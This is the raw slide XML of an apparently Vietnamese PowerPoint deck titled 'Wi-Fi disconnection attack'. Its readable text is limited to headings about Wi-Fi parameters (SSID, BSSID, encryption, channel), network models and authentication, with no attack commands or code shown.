                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1503649" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1503649" y="1557452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1557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86020">
            <a:off x="516920" y="4439572"/>
            <a:ext cx="3235548" cy="2723743"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3235548" h="2723743">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3235547" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3235547" y="2723743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2723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236115" y="8926138"/>
            <a:ext cx="1585169" cy="959748"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1585169" h="959748">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1585170" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1585170" y="959748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9597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8633563" y="141128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7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1573407" y="1504750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1504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8064063" y="-2139098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8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6991138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-2508815" y="-3518775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532414" y="-4564202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3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="70870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3259880" y="-224644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5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7536935" y="4946969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="49469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10915">
            <a:off x="15652866" y="263168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-1498575" y="-224644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9907824" y="-170666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736547" y="3176876"/>
            <a:ext cx="10814907" cy="1811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99"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10571" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CF7D68"/>
                </a:solidFill>
                <a:latin typeface="Paytone One"/>
                <a:ea typeface="Paytone One"/>
                <a:cs typeface="Paytone One"/>
                <a:sym typeface="Paytone One"/>
              </a:rPr>
              <a:t>Question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3130" y="2846307"/>
            <a:ext cx="2153858" cy="1973717"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2153858" h="1973717">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2153858" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2153858" y="1973717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1973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75870" y="6718945"/>
            <a:ext cx="1503649" cy="1557451"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1503649" h="1557451">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1503648" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1503648" y="1557451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="155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86020">
            <a:off x="-399665" y="2746382"/>
            <a:ext cx="3235548" cy="2723743"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3235548" h="2723743">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3235548" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3235548" y="2723743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2723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236115" y="8926138"/>
            <a:ext cx="1585169" cy="959748"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1585169" h="959748">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1585170" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1585170" y="959748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9597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8633563" y="-279890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7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1573407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8064063" y="-2560117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8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6991138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-2508815" y="-3939794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532414" y="-4985221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3259880" y="-2667465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5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7536935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10915">
            <a:off x="16294770" y="374942"/>
            <a:ext cx="1725696" cy="1044831"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1725696" h="1044831">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1725696" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1725696" y="1044831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10448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-1498575" y="-2667465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9907824" y="-2127681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4">
            <a:alphaModFix amt="65999"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2924870" y="3833166"/>
            <a:ext cx="12438260" cy="3047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6838" y="2752841"/>
            <a:ext cx="14634324" cy="14619032"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14634324" h="14619032">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14634324" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14634324" y="14619032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1461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01973" y="666750"/>
            <a:ext cx="1393315" cy="1276783"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1393315" h="1276783">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1393315" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393315" y="1276783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1276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41717" y="7080007"/>
            <a:ext cx="1155060" cy="1196390"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1155060" h="1196390">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1155060" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1155060" y="1196389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11963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5919" y="-111883"/>
            <a:ext cx="3826281" cy="3221033"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3826281" h="3221033">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3826281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3826281" y="3221033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="32210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12721173" y="3513003"/>
            <a:ext cx="7315200" cy="2566970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7315200" h="2566970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7315200" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7315200" y="2566971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="256697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964435" y="1343776"/>
            <a:ext cx="1235912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WIFI - Thông số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83829" y="3394900"/>
            <a:ext cx="10955612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20A0A4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SSID (Service Set Identifier) - Tên mạng Wi-Fi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90303" y="4516032"/>
            <a:ext cx="12568560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20A0A4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BSSID (Basic Service Set Identifier) - Địa chỉ MAC của AP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96777" y="5637165"/>
            <a:ext cx="10955612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20A0A4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ENC (Encryption) - Loại mã hóa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48560" y="6760480"/>
            <a:ext cx="10955612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20A0A4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Channel - Kênh Wi-Fi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4208" y="626629"/>
            <a:ext cx="1498298" cy="1372986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1498298" h="1372986">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1498298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498298" y="1372986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="137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14853" y="6761622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51535" y="3003915"/>
            <a:ext cx="1810145" cy="1523813"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1810145" h="1523813">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1810145" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1810145" y="1523813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1523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60468" y="2622984"/>
            <a:ext cx="5570261" cy="3481413"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5570261" h="3481413">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5570261" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5570261" y="3481413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="348141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55367" y="5682855"/>
            <a:ext cx="5577267" cy="3575445"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5577267" h="3575445">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5577266" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5577266" y="3575445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3575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161233" y="2622984"/>
            <a:ext cx="5371324" cy="3481413"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5371324" h="3481413">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5371324" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5371324" y="3481413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="348141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64435" y="895350"/>
            <a:ext cx="1235912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WIFI - Mô hình</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-9064264">
            <a:off x="12097092" y="-334853"/>
            <a:ext cx="7315200" cy="2566970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7315200" h="2566970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7315200" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7315200" y="2566970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25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4208" y="626629"/>
            <a:ext cx="1498298" cy="1372986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1498298" h="1372986">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1498298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498298" y="1372986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="137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14853" y="6761622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3458" y="5388636"/>
            <a:ext cx="1630977" cy="1372986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1630977" h="1372986">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1630977" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1630977" y="1372986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13729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67039" y="2150697"/>
            <a:ext cx="11372165" cy="7107603"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11372165" h="7107603">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11372165" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11372165" y="7107603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="710760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73557" y="713365"/>
            <a:ext cx="1235912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WIFI - Mô hình</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-9064264">
            <a:off x="12097092" y="-334853"/>
            <a:ext cx="7315200" cy="2566970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7315200" h="2566970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7315200" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7315200" y="2566970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25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4208" y="626629"/>
            <a:ext cx="1498298" cy="1372986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1498298" h="1372986">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1498298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498298" y="1372986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="137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14853" y="4069592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87017" y="6660084"/>
            <a:ext cx="1630977" cy="1372986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1630977" h="1372986">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1630977" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1630977" y="1372986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13729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67039" y="2150697"/>
            <a:ext cx="11372165" cy="7107603"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11372165" h="7107603">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11372165" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11372165" y="7107603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="710760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73557" y="713365"/>
            <a:ext cx="1235912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WIFI - Mô hình</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-9064264">
            <a:off x="12097092" y="-334853"/>
            <a:ext cx="7315200" cy="2566970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7315200" h="2566970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7315200" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7315200" y="2566970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25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66733" y="2129053"/>
            <a:ext cx="11372470" cy="7290605"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11372470" h="7290605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11372471" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11372471" y="7290605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="729060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4208" y="626629"/>
            <a:ext cx="1498298" cy="1372986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1498298" h="1372986">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1498298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498298" y="1372986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="137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13347" y="6340603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4000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1634000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0468" y="6340603"/>
            <a:ext cx="1630977" cy="1372986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1630977" h="1372986">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1630977" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1630977" y="1372986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13729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67039" y="2150697"/>
            <a:ext cx="11372165" cy="7107603"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11372165" h="7107603">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11372165" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11372165" y="7107603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="710760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73557" y="713365"/>
            <a:ext cx="1235912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WIFI - Mô hình</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-9064264">
            <a:off x="12097092" y="-334853"/>
            <a:ext cx="7315200" cy="2566970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7315200" h="2566970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7315200" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7315200" y="2566970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25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66733" y="2129053"/>
            <a:ext cx="11372470" cy="7290605"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11372470" h="7290605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11372471" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11372471" y="7290605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="729060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567039" y="2355428"/>
            <a:ext cx="11372165" cy="6902872"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11372165" h="6902872">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11372165" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11372165" y="6902872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6902872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4750" t="-830" b="-11022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77579" y="3999429"/>
            <a:ext cx="1393497" cy="1443358"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1393497" h="1443358">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1393497" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393497" y="1443358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1443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30841" y="-397705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1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3052911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05548" y="1028700"/>
            <a:ext cx="5995806" cy="4234902"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5995806" h="4234902">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5995806" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5995806" y="4234902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="423490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33924" y="5577600"/>
            <a:ext cx="15820152" cy="3680700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="15820152" h="3680700">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15820152" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15820152" y="3680700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="368070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124200" y="2217938"/>
            <a:ext cx="6280616" cy="2503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WIFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="10080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1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Xác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0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7200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="449FA2"/>
                </a:solidFill>
                <a:latin typeface="Paytone One"/>
                <a:ea typeface="Paytone One"/>
                <a:cs typeface="Paytone One"/>
                <a:sym typeface="Paytone One"/>
              </a:rPr>
              <a:t>thực</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="449FA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647</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>122</Paragraphs>
  <Slides>36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Happy Font TH</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Open Sauce Bold</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Paytone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Tấn công ngắt kết nối wifi</dc:title>
  <cp:lastModifiedBy>NGUYỄN HỮU TRÍ</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-14T10:28:53Z</dcterms:modified>
  <dc:identifier>DAGhNNh2M9Y</dc:identifier>
</cp:coreProperties>
</file>